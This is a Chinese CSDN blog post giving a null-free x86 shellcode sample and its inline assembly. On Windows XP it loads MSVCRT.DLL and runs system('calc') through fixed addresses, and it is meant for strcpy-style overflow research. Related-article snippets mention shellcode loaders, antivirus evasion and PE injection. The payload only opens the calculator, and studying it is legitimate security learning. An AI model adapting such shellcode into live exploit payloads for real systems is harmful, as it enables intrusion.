shellcode样本—弹出计算器

最新推荐文章于 2023-08-10 18:45:10 发布
最新推荐文章于 2023-08-10 18:45:10 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: 漏洞原理笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/musilintan/article/details/116243553
版权

该样本弹出计算器的原理为:
1)先加载MSVCRT.DLL。
2)再使用system()函数调用calc命令。

该shellcode脚本只在xp下通过实验,仅适合用来研究和验证漏洞。其中的函数地址采用的都是固定地址。win7以上不适用。

该样本特点:没有任何0x00,可以参与字符串类溢出。比如strcpy等。

unsigned char shellcode2[] =
		"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
		"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"
		"\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA"
		"\x7b\x1d\x80\x7c"
		"\x52\x8D\x45\xF4\x50"
		"\xFF\x55\xF0"
		"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x61\x6C\x63\x89\x45\xF4\x33\xC0\x89\x45\xF8"
		"\x8D\x45\xF4"
		"\x50\xB8"
		"\xc7\x93\xbf\x77"
		"\xFF\xD0";

void Test1()
{
	__asm
	{
		push    ebp
		mov     ebp, esp
		xor     eax, eax
		push    eax
		push    eax
		push    eax
		mov     byte ptr[ebp - 0Ch], 4Dh; 'M'
		mov     byte ptr[ebp - 0Bh], 53h; 'S'
		mov     byte ptr[ebp - 0Ah], 56h; 'V'
		mov     byte ptr[ebp - 9], 43h; 'C'
		mov     byte ptr[ebp - 8], 52h; 'R'
		mov     byte ptr[ebp - 7], 54h; 'T'
		mov     byte ptr[ebp - 6], 2Eh; '.'
		mov     byte ptr[ebp - 5], 44h; 'D'
		mov     byte ptr[ebp - 4], 4Ch; 'L'
		mov     byte ptr[ebp - 3], 4Ch; 'L'
		mov     edx, 7C801D7Bh
		push    edx
		lea     eax, [ebp - 0Ch]
		push    eax
		call    dword ptr[ebp - 10h]
		push    ebp
		mov     ebp, esp
		sub     esp, 2Ch
		mov     eax, 636C6163h
		mov[ebp - 0Ch], eax
		xor     eax, eax
		mov[ebp - 8], eax
		lea     eax, [ebp - 0Ch]
		push    eax
		mov     eax, 77BF93C7h
		call    eax
	}
}
孤月丶星辰
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
汇编语言编写shellcode实现计算器
yeanhoo的博客
04-04 1846
使用汇编语言编写shellcode,调用WinExec实现弹出计算器,汇编代码如下: .386 .model flat,stdcall ; 代码区域 .code main: push ebp mov ebp,esp sub esp,20h; 开辟栈空间 ; 获取Kernel32基址 assume fs:nothing mov eax,[fs:30h]; peb结构所在地址 mov ...
栈溢出攻击之弹出计算器
Bonjour~
04-15 7687
一.系统栈溢出原理函数栈帧及寄存器在高级语言中,当函数被调用时,系统栈会为这个函数开辟一个新的栈帧,并把它压入栈中。这个栈帧中的内存空间被它所属的函数独占,正常情况下是不会和别的函数共享的。当函数返回时,系统栈会弹出该函数所对应的栈帧。Win32系统提供两个特殊的寄存器用于标识位于系统栈顶端的栈帧: 1. ESP:栈指针寄存器,其内存放着一个指针,该指针永远指向系统栈最上面一个栈帧的栈顶; 2.
dll劫持payload.dll弹出计算器
03-18
dll劫持payload.dll弹出计算器
弹出DOS窗口的缓冲区溢出shellcode源代码及可执行文件
05-06
弹出DOS窗口的缓冲区溢出shellcode源代码及可执行文件,有两个不同的程序代码
2023-06-28-[免杀学习]shellcode的使用(C++)
qq_42585535的博客
06-29 644
功能:调整一片在虚拟地址空间的内存的状态返回值:调指向整的内存的起始地址的指针win api为了准确的表达指针的作用对象,将void命名为了许多其他类型,但其本质都是voidvoid类型是一种无类型指针,也就是说它可以指向任意类型的数据用作函数的返回类型,表示函数不返回任何值。用作函数的参数类型,表示函数可以接受任意类型的指针。例如,内存分配函数 malloc 和 memset 的参数就是 void* 类型。
shellcode2--弹出计算器
gclome的博客
02-18 2197
// 345.cpp : Defines the entry point for the console application. // #include "stdafx.h" #include "stdio.h" #include "windows.h" char shellcode[]="\x66\x81\xEC\x54\x04\x33\xDB\x53\x68\x2E\x65\x78\x65\...
Shellcode提取、加载与解析
莫慌的博客
03-06 1952
msf的shellcode 如何实现的
shellcode——1、采用硬编码弹出计算器
alwin_cx的博客
05-19 6415
一、shellcode介绍    用一句话给shellcode下个定义,那就是“一段可以执行特定功能的机器码”。二、实验环境及工具介绍实验环境:Windows XP SP3实验工具:OllyDbg、WinHex、LordPE三、编程思路     用C语言来描述其实就是两句:WinExec("calc.exe", 5); ExitProcess(0);     看到有些文章会在开头还加一句:Load...
Custom Shellcode
最新发布
05-16
Custom Shellcode 代码参考.
shellcode转unicode工具
06-13
这是一款超级便宜的shellcode转unicode工具,非常好用!
vbs shellcode转换escape加密
09-06
### vbs shellcode转换escape加密 #### 知识点一:Shellcode简介 Shellcode是一种小型的、可执行的机器码片段,常被用于利用软件漏洞进行攻击时植入恶意指令。它通常用来绕过安全机制并执行攻击者指定的操作,如...
用C++撰写shellcode.zip
10-06
**shellcode**是一种特殊的计算机代码,通常用于利用软件漏洞,以执行攻击者指定的任意代码。在本教程中,我们将探讨如何使用C++语言来编写shellcode,这是一门强大的编程语言,允许我们精确地控制内存和系统调用,...
ShellCode01: 弹出计算器
weixin_30399797的博客
04-15 877
简单地讲,ShellCode就是一段01二进制的机器码,试图利用软件中的漏洞完成自己想做的事情。ShellCode的编写需要考虑和顾及的东西很多,这里先写一个适合新手的范例。 *需要的预备知识: 1.汇编语言(尤其要清楚了解函数是如何调用的) 2.PE文件格式(可参考《Windows PE 权威指南》一书) 3.一点点WinAPI函数 *使用的工具软件: 1.MASM32 2....
windows下shellcode编写入门
热门推荐
x_nirvana的博客
03-31 1万+
本文简要介绍shellcode开发技术及其特点。理解这些概念可以有助于我们编写自己的shellcode。更进一步讲,你可以修改现有的漏洞利用代码来执行自己所需要的定制功能。
利用白名单绕过限制的更多测试
weixin_34176694的博客
03-08 763
三好学生 · 2015/10/08 10:100x00 前言subTee在博客中不仅介绍了如何利用InstallUtil.exe直接执行pe文件,还提到了另一种利用方式——利用InstallUtil执行shellcode 从subTee分享的代码可以看出其测试环境为64位、.net4.0环境,在360安全播报上发表的文章也认为执行环境必须是.net4.0以上,适用范围很窄 但我并不这么认为下面我们...
利用Shellcode注入PE文件加载计算器
威化饼的一隅
04-16 2963
文章目录简介C语言版shellcode汇编版shellcodeshellcode跳转到原入口地址代码编写思路源代码 简介 采用C语言查看和修改一些PE文件的关键结构,结合shellcode,完成功能: 先用C语言编写通过LoadLibrary()和GetProcAddress()调用msvcrt.dll中的system()函数来弹出计算器的代码。在OllyDbg中打开该程序,查看对应的汇编代码和...
c和汇编混合编程----shellcode----弹出计算器
qq_41683305的博客
02-09 1001
先用c和汇编混合编程成功弹出计算器(在VC++里运行) #include "stdio.h" #include "windows.h" int main(int argc, char* argv[]) { printf("begin\n"); HINSTANCE libHandle; char *dll="kernel32.dll"; libHandle=LoadLibrar...
木马免杀(篇二)shellcode 学习
Goodric的博客
08-10 1724
shellcode 是一段利用软件漏洞进行执行的机器码, 通常用汇编语言编写并被翻译为十六进制操作码,因常被攻击者用于获取系统的命令终端shell 接口,所以被称为 shellcode。说到获取系统的命令终端shell 接口,shell 是操作系统中提供给用户用于内核交互执行任意系统命令的应用程序。Windows操作系统中的shell 包括 命令提示符cmd 和 powershell 应用程序。Linux操作系统中的 bash shell
漏洞学习笔记——堆溢出原理
谈成(C/C++)
04-14 3645
最近在学习堆的溢出原理,但是查了网上和书上的一些讲解,总是感觉缺少一些关键点。所以理解起来总是有点晕,经过努力的调试分析后,总结了下面的更为详细的堆溢出原理。如果不准确的地方,希望大佬可以提醒一哈~ 1.堆的结构: struct _LIST_ENTRY{ DWORD Flink; DWORD Blink; } //空闲堆头结构 struct _HEAP_FREE_ENTRY{ union{ struct{ union{ struct { WORD Size;
shellcode计算器
09-08
shellcode计算器是一种恶意代码,用于利用计算机系统中的漏洞,并在系统中执行特定的操作。引用中提到的样本是一种shellcode,它的原理是通过加载MSVCRT.DLL库,然后使用system()函数调用calc命令,从而打开计算器应用程序。然而,引用中指出,该shellcode脚本只在Windows XP系统下适用,且其中的函数地址采用的是固定地址,不适用于Windows 7及以上版本的系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

孤月丶星辰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值